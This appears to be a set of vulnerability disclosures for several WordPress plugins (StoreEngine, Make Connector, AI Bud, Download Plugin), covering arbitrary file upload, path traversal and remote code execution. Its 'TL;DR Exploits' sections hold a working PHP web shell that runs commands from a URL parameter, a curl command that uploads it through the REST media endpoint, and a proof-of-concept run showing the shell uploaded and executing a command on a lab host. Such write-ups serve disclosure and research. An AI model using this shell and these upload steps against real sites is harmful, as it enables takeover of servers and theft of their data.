The StoreEngine plugin contains a vulnerability in it’s CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to upload arbitrary files and gain remote code execution. The vulnerability stems from two security flaws: (1) the CSV import endpoint lacks proper file validation checks, permission checks, and only relies on nonce verification for security, and (2) the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. This combination allows any authenticated user to extract the nonce from frontend pages and use it to upload PHP web shells via the storeengine_csv/import endpoint, effectively granting subscriber+ users the ability to execute arbitrary code on the server.
The StoreEngine plugin contains a vulnerability in its CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to download arbitrary files from the server, including sensitive system files, WordPress configuration files, and plugin source code. The vulnerability stems from the storeengine_csv/file_download endpoint lacking proper path sanitization and only relying on nonce verification for security, while the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. Note: This vulnerability requires the CSV Import/Export addon to be enabled by an administrator. Once enabled, this combination allows any authenticated user to extract the nonce from frontend pages and use it to download any file on the server via path traversal attacks, effectively granting subscriber+ users access to sensitive system and application files.
The Make Connector plugin does not sanitize the file types in its REST API media uploads, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.
TL;DR Exploits
cat << 'EOF' > shello.php
<?php
// Silence is golden
if (!empty($_GET['cmd'])) {
echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
}
?>
EOFcurl -k -X POST https://lab1.hacker/wp-json/wp/v2/media \
-H "IWC-API-KEY: YOURFRIENDLYKEYHERE"\
-F "file=@shello.php"\
-F "title=Hacker World"\
-F "description=A test file"\
-F "caption=Hacker Caption"\
Leveraging the shell once it’s in the uploads folder:
The AI Bud plugin exposes a REST API endpoint /wp-json/ai-buddy/v1/wp/attachments that allows uploading files to the WordPress media library. The endpoint’s file logic contains file renaming functionality that triggers after file type validation, and allows the attacker to rename the uploaded file to any extension (including.php) allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.
TL;DR Exploits
A POC cve-2025-23968.py is provided to demonstrate an administrator uploading a web shell named shell.php.
The Download Plugin does not sanitize the file types of the dpwap_plugin_locInstall function
exposed via the mul_upload admin page, allowing administrators or above to upload arbitrary files and
potentially gain code execution on the server.
TL;DR Exploits
A POC cve-2025-6586.py is provided to demonstrate an administrator uploading a web shell named shell.php.
python3 cve-2025-6586.py https://lab1.hacker admin PASSWORD
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
Uploading web shell: shell.php
Web Shell Location: https://lab1.hacker/wp-
content/uploads/dpwap_logs/files/tmp/shell.php
Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
altname enp0s3
inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
v alid_lft 75221sec preferred_lft 75221sec
inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic
mngtmpaddr noprefixroute
valid_lft 86354sec preferred_lft 14354sec
inet6 fe80::a00:27ff:fe5b:342f/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
altname enp0s8
inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe39:eaeb/64 scope link
valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue
state DOWN group default
link/ether 02:42:77:47:94:a5 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
</pre>
Details
The dpwap_plugin_multiple_upload_func function is exposed in the mul_upload admin page. On line 80 of /wp-content/plugins/download-plugin/app/Plugins/Base.php the function includes multiple_upload_plugin.php.